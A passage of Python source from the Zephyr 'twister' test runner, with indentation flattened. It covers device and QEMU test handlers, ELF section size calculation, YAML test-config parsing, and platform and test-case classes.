# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
self.instance.results = harness.tests
# sometimes a test instance hasn't been executed successfully with an
# empty dictionary results, in order to include it into final report,
# so fill the results as BLOCK
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise TwisterRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
